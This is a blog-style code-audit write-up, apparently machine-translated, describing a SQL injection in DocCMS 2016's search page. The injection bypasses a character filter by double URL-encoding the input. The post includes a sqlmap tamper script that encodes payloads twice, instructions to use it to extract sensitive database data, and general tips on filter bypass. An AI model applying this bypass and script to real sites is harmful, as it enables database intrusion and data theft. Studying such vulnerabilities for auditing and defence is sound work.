Hacking Book | Free Online Hacking Learning


instance of sql secondary code injection vulnerability (with tamper script)

Posted by harmelink at 2020-03-27

Share an audit instance of SQL secondary code injection vulnerability, and attach the tamper script.

Doccms official website: http://www.doccms.com

Source code: doccms2016

Download address: https://pan.baidu.com/s/1plclifl

In / content / search / index.php, first, illegal character detection is performed for the parameter keyword:

Further trace the checksqlstr function to see how the code is filtered. In / Inc / function.php:

The checksqlstr function performs regular matching on the incoming string to check whether the function has illegal characters. Continue to see the get [search] result function in / content / search / index.php:

After the illegal character detection of the parameter keyword, the URL is decoded and then spliced into the SQL statement for execution. If we pass in a double URL encoded string, it will bypass illegal character detection, and then be decoded by URLDecode and carried into the database for execution, resulting in a SQL injection vulnerability.

1. Double URLEncode is bypassed by writing tamper. The tamper script is as follows:

#!/usr/bin/env python

Import re

from urllib import quote

from lib.core.data import kb

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():


def tamper(payload, **kwargs):

    retVal = payload

    retVal = quote(quote(retVal))    

    return retVal

2. Load tamper script through sqlmap to obtain database sensitive data

In code audit, some encoding and decoding functions, such as urldecode(), rawurldecode(), base64 ﹐ decode(), can be used to bypass the protection.

In addition, in the actual combat, when encountering the situation of SQL and XSS secondary encoding bypassing, there are also some cases. In addition to single quotation mark and double quotation mark, we should also pay attention to% 2527 and% 2522 for testing.


About Me

A network security enthusiast has a paranoid pursuit of technology. Committed to sharing original high-quality dry goods, including but not limited to: penetration testing, WAF bypass, code audit, security operation and maintenance.